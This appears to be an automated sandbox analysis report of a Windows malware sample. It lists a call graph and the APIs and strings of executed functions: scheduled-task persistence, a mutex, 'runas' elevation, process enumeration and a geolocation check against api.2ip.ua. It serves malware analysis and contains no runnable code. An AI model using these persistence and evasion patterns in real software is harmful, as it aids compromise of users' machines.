45373 414690 59 API calls 45371->45373 45374 415c60 45373->45374 45374->44881 45375->44883 45376->44886 45377->44892 45378->44902 45380 413a90 59 API calls 45379->45380 45381 41294c MultiByteToWideChar 45380->45381 45382 418400 59 API calls 45381->45382 45383 41298d 45382->45383 45383->44905 45384->44910 45385->44918 45386->44924 45387->44928 45388->44932 45389->44936 45390->44940 45391->44944 45392->44948 45393->44950 45394->44952 45395->44954 45396->44956 45397->44958 45398->44960 45399->44962 45400->44964 45401->44966 45402->44968 45403->44970 45404->44972 45405->44974 45406->44976 45407->44978 45408->44980 45410 412c71 45409->45410 45411 412c5f 45409->45411 45414 4156d0 59 API calls 45410->45414 45412 4156d0 59 API calls 45411->45412 45413 412c6a 45412->45413 45413->44985 45415 412c8a 45414->45415 45415->44985 45416->44987 45417->45010 45418->45010 45419->45010 45420->44991 45421->44993 45422->44996 45423->44999 45424->45002 45425->45004 45426->45007 45427->45012 45428->45014 45429->45038 45430->45038 45431->45038 45432->45038 45433->45038 45434->45038 45721 41f130 218 API calls _LangCountryEnumProc@4 45434->45721 45435->45018 45722 41fd80 64 API calls 45435->45722 45439 415735 45438->45439 45444 4156de 45438->45444 45440 4157bc 45439->45440 45441 41573e 45439->45441 45462 44f23e 59 API calls 2 library calls 45440->45462 45450 415750 ___init_ctype 45441->45450 45461 416760 59 API calls 2 library calls 45441->45461 45444->45439 45448 415704 45444->45448 45451 415709 45448->45451 45452 41571f 45448->45452 45450->45139 45459 413ff0 59 API calls ___init_ctype 45451->45459 45460 413ff0 59 API calls ___init_ctype 45452->45460 45455 41572f 45455->45139 45456 415719 45456->45139 45457->45143 45458->45142 45459->45456 45460->45455 45461->45450 45469 423b4c 45463->45469 45465 41ccca 45468 41a00a 45465->45468 45479 44f1bb 59 API calls 3 library calls 45465->45479 45468->44795 45468->44796 45473 423b54 45469->45473 45470 420c62 _malloc 58 API calls 45470->45473 45471 423b6e 45471->45465 45473->45470 45473->45471 45474 423b72 std::exception::exception 45473->45474 45480 42793d DecodePointer 45473->45480 45481 430eca RaiseException 45474->45481 45476 423b9c 45482 430d91 58 API calls _free 45476->45482 45478 423bae 45478->45465 45480->45473 45481->45476 45482->45478 45484 423b4c 59 API calls 45483->45484 45485 41cc5d 45484->45485 45487 41cc64 45485->45487 45490 44f1bb 59 API calls 3 library calls 45485->45490 45487->45151 45489 41d740 59 API calls 45487->45489 45489->45151 45493->45168 45494->45168 45498 431570 45495->45498 45499 431580 45498->45499 45500 431586 45499->45500 45505 4315ae 45499->45505 45509 425208 58 API calls __getptd_noexit 45500->45509 45502 43158b 45510 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45502->45510 45506 4315cf wcstoxq 45505->45506 45511 42e883 GetStringTypeW 45505->45511 45508 41a36e lstrcpyW lstrcpyW 45506->45508 45512 425208 58 API calls __getptd_noexit 45506->45512 45508->44829 45509->45502 45510->45508 45511->45505 45512->45508 45514 411cf2 RegOpenKeyExW 45513->45514 45514->45175 45514->45199 45515->45184 45516->45202 45518 420241 45517->45518 45519 4202b6 45517->45519 45522 420266 45518->45522 45527 425208 58 API calls __getptd_noexit 45518->45527 45529 4202c8 60 API calls 3 library calls 45519->45529 45521 4202c3 45521->45222 45522->45222 45524 42024d 45528 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45524->45528 45526 420258 45526->45222 45527->45524 45528->45526 45529->45521 45530->45248 45531->45249 45532->45237 45535->45267 45536->45271 45537->45257 45538->45258 45541 423b4c 59 API calls 45540->45541 45542 40b164 45541->45542 45543 40b177 SysAllocString 45542->45543 45544 40b194 45542->45544 45543->45544 45544->45285 45546 40b1de 45545->45546 45548 40b202 45545->45548 45547 40b1f5 SysFreeString 45546->45547 45546->45548 45547->45548 45548->45287 45550 423add __aulldiv 45549->45550 45550->45323 45564 43035d 45551->45564 45553 42355a 45555 40d78f 45553->45555 45572 423576 45553->45572 45556 4228e0 45555->45556 45674 42279f 45556->45674 45560 40b423 45559->45560 45561 40b41d 45559->45561 45562 40b42d VariantClear 45560->45562 45561->45345 45562->45345 45563->45353 45605 42501f 58 API calls 4 library calls 45564->45605 45566 430369 45569 43038d 45566->45569 45606 425208 58 API calls __getptd_noexit 45566->45606 45567 430363 45567->45566 45567->45569 45571 428cde __malloc_crt 58 API calls 45567->45571 45569->45553 45570 43036e 45570->45553 45571->45566 45573 423591 45572->45573 45574 4235a9 _memset 45572->45574 45615 425208 58 API calls __getptd_noexit 45573->45615 45574->45573 45581 4235c0 45574->45581 45576 423596 45616 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45576->45616 45578 4235cb 45617 425208 58 API calls __getptd_noexit 45578->45617 45579 4235e9 45607 42fb64 45579->45607 45581->45578 45581->45579 45583 4235ee 45618 42f803 58 API calls __wopenfile 45583->45618 45585 4235f7 45586 4237e5 45585->45586 45619 42f82d 58 API calls __wopenfile 45585->45619 45632 4242fd 8 API calls 2 library calls 45586->45632 45589 423609 45589->45586 45620 42f857 45589->45620 45590 4237ef 45592 42361b 45592->45586 45593 423624 45592->45593 45594 42369b 45593->45594 45596 423637 45593->45596 45630 42f939 58 API calls 4 library calls 45594->45630 45627 42f939 58 API calls 4 library calls 45596->45627 45597 4236a2 45604 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 45597->45604 45631 42fbb4 58 API calls 4 library calls 45597->45631 45599 42364f 45599->45604 45628 42fbb4 58 API calls 4 library calls 45599->45628 45602 423668 45602->45604 45629 42f939 58 API calls 4 library calls 45602->45629 45604->45555 45605->45567 45606->45570 45608 42fb70 _ctrlevent_capture@4 45607->45608 45609 42fba5 _ctrlevent_capture@4 45608->45609 45610 428af7 __lock 58 API calls 45608->45610 45609->45583 45611 42fb80 45610->45611 45612 42fb93 45611->45612 45633 42fe47 45611->45633 45662 42fbab LeaveCriticalSection _doexit 45612->45662 45615->45576 45616->45604 45617->45604 45618->45585 45619->45589 45621 42f861 45620->45621 45622 42f876 45620->45622 45672 425208 58 API calls __getptd_noexit 45621->45672 45622->45592 45624 42f866 45673 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45624->45673 45626 42f871 45626->45592 45627->45599 45628->45602 45629->45604 45630->45597 45631->45604 45632->45590 45634 42fe53 _ctrlevent_capture@4 45633->45634 45635 428af7 __lock 58 API calls 45634->45635 45636 42fe71 _W_expandtime 45635->45636 45637 42f857 __tzset_nolock 58 API calls 45636->45637 45638 42fe86 45637->45638 45649 42ff25 __tzset_nolock __isindst_nolock 45638->45649 45663 42f803 58 API calls __wopenfile 45638->45663 45641 42fe98 45641->45649 45664 42f82d 58 API calls __wopenfile 45641->45664 45642 42ff71 GetTimeZoneInformation 45642->45649 45645 42feaa 45645->45649 45665 433f99 58 API calls 2 library calls 45645->45665 45646 42ffd8 WideCharToMultiByte 45646->45649 45648 42feb8 45666 441667 78 API calls 3 library calls 45648->45666 45649->45642 45649->45646 45650 430010 WideCharToMultiByte 45649->45650 45655 43ff8e 58 API calls ___getlocaleinfo 45649->45655 45660 423c2d 61 API calls UnDecorator::getTemplateConstant 45649->45660 45661 430157 __tzset_nolock _ctrlevent_capture@4 __isindst_nolock 45649->45661 45669 4242fd 8 API calls 2 library calls 45649->45669 45670 420bed 58 API calls 2 library calls 45649->45670 45671 4300d7 LeaveCriticalSection _doexit 45649->45671 45650->45649 45653 42ff0c _strlen 45656 428cde __malloc_crt 58 API calls 45653->45656 45654 42fed9 type_info::operator!= 45654->45649 45654->45653 45667 420bed 58 API calls 2 library calls 45654->45667 45655->45649 45658 42ff1a _strlen 45656->45658 45658->45649 45668 42c0fd 58 API calls __wopenfile 45658->45668 45660->45649 45661->45612 45662->45609 45663->45641 45664->45645 45665->45648 45666->45654 45667->45653 45668->45649 45669->45649 45670->45649 45671->45649 45672->45624 45673->45626 45701 42019c 45674->45701 45677 4227d4 45709 425208 58 API calls __getptd_noexit 45677->45709 45679 4227d9 45710 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45679->45710 45680 4227e9 MultiByteToWideChar 45682 422804 GetLastError 45680->45682 45683 422815 45680->45683 45711 4251e7 58 API calls 3 library calls 45682->45711 45686 428cde __malloc_crt 58 API calls 45683->45686 45684 40d7a3 45684->45328 45688 42281d 45686->45688 45687 422810 45714 420bed 58 API calls 2 library calls 45687->45714 45688->45687 45689 422825 MultiByteToWideChar 45688->45689 45689->45682 45691 42283f 45689->45691 45693 428cde __malloc_crt 58 API calls 45691->45693 45692 4228a0 45715 420bed 58 API calls 2 library calls 45692->45715 45695 42284a 45693->45695 45695->45687 45712 42d51e 88 API calls 3 library calls 45695->45712 45697 422866 45697->45687 45698 42286f WideCharToMultiByte 45697->45698 45698->45687 45699 42288b GetLastError 45698->45699 45713 4251e7 58 API calls 3 library calls 45699->45713 45702 4201ad 45701->45702 45708 4201fa 45701->45708 45716 425007 58 API calls 2 library calls 45702->45716 45704 4201b3 45705 4201da 45704->45705 45717 4245dc 58 API calls 6 library calls 45704->45717 45705->45708 45718 42495e 58 API calls 6 library calls 45705->45718 45708->45677 45708->45680 45709->45679 45710->45684 45711->45687 45712->45697 45713->45687 45714->45692 45715->45684 45716->45704 45717->45705 45718->45708 45719->45370 45726 427e1a _ctrlevent_capture@4 45725->45726 45727 428af7 __lock 51 API calls 45726->45727 45728 427e21 45727->45728 45729 427eda _doexit 45728->45729 45730 427e4f DecodePointer 45728->45730 45745 427f28 45729->45745 45730->45729 45732 427e66 DecodePointer 45730->45732 45738 427e76 45732->45738 45734 427f37 _ctrlevent_capture@4 45734->45041 45736 427e83 EncodePointer 45736->45738 45737 427f1f 45739 427b0b _fast_error_exit 3 API calls 45737->45739 45738->45729 45738->45736 45740 427e93 DecodePointer EncodePointer 45738->45740 45741 427f28 45739->45741 45743 427ea5 DecodePointer DecodePointer 45740->45743 45742 427f35 45741->45742 45750 428c81 LeaveCriticalSection 45741->45750 45742->45041 45743->45738 45746 427f08 45745->45746 45747 427f2e 45745->45747 45746->45734 45749 428c81 LeaveCriticalSection 45746->45749 45751 428c81 LeaveCriticalSection 45747->45751 45749->45737 45750->45742 45751->45746

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                                                                                                                                                          • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                                                                                                                          • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                                                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0071B768,?), ref: 0041A0BB
                                                                                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                                                                                                                                                          • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                                                                                                                          • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                                                                                                                                                          • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                                                                                                                                        • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                                                                                                                                                        • API String ID: 2957410896-3144399390
                                                                                                                                                                                                                                        • Opcode ID: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                                                                                                                                                                                                                        • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702comCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 691 40da8e-40da92 689->691 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 691->693 694 40da9f-40dab1 691->694 693->694 704 40d3e2-40d3fe call 40b140 697->704 705 40d3cc-40d3dd CoUninitialize 697->705 700 40da69-40da6d 698->700 702 40da7a-40da8a 700->702 703 40da6f-40da77 call 422587 700->703 702->691 703->702 711 40d400-40d402 704->711 712 40d404 704->712 705->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0040D26C
                                                                                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                                                                                                                        • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                                                                                                                                        • API String ID: 2496729271-1738591096
                                                                                                                                                                                                                                        • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                                                                                                                        • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                                                                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                                                                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                                                                                                                                                        • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                                                                                                                                                        • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228networkfileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 903 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 910 40cfb2-40cfb4 903->910 911 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 903->911 912 40d213-40d217 910->912 916 40d000-40d01d 911->916 914 40d224-40d236 912->914 915 40d219-40d221 call 422587 912->915 915->914 918 40d023-40d02c 916->918 919 40d01f-40d021 916->919 922 40d030-40d035 918->922 921 40d039-40d069 call 4156d0 call 414300 919->921 928 40d1cb 921->928 929 40d06f-40d08b call 413010 921->929 922->922 924 40d037 922->924 924->921 931 40d1cd-40d1d1 928->931 935 40d0b9-40d0bd 929->935 936 40d08d-40d091 929->936 933 40d1d3-40d1db call 422587 931->933 934 40d1de-40d1f4 931->934 933->934 938 40d201-40d20f 934->938 939 40d1f6-40d1fe call 422587 934->939 944 40d0cd-40d0e1 call 414300 935->944 945 40d0bf-40d0ca call 422587 935->945 941 40d093-40d09b call 422587 936->941 942 40d09e-40d0b4 call 413d40 936->942 938->912 939->938 941->942 942->935 944->928 954 40d0e7-40d149 call 413010 944->954 945->944 957 40d150-40d15a 954->957 958 40d160-40d162 957->958 959 40d15c-40d15e 957->959 961 40d165-40d16a 958->961 960 40d16e-40d18b call 40b650 959->960 965 40d19a-40d19e 960->965 966 40d18d-40d18f 960->966 961->961 962 40d16c 961->962 962->960 965->957 968 40d1a0 965->968 966->965 967 40d191-40d198 966->967 967->965 969 40d1c7-40d1c9 967->969 970 40d1a2-40d1a6 968->970 969->970 971 40d1b3-40d1c5 970->971 972 40d1a8-40d1b0 call 422587 970->972 971->931 972->971
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0040CF4A
                                                                                                                                                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                                                                                                                                                        • "country_code":", xrefs: 0040CFE1
                                                                                                                                                                                                                                        • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                                                                                                                                        • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                                                                                                                                        • API String ID: 1485416377-2962370585
                                                                                                                                                                                                                                        • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                                                                                                        • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
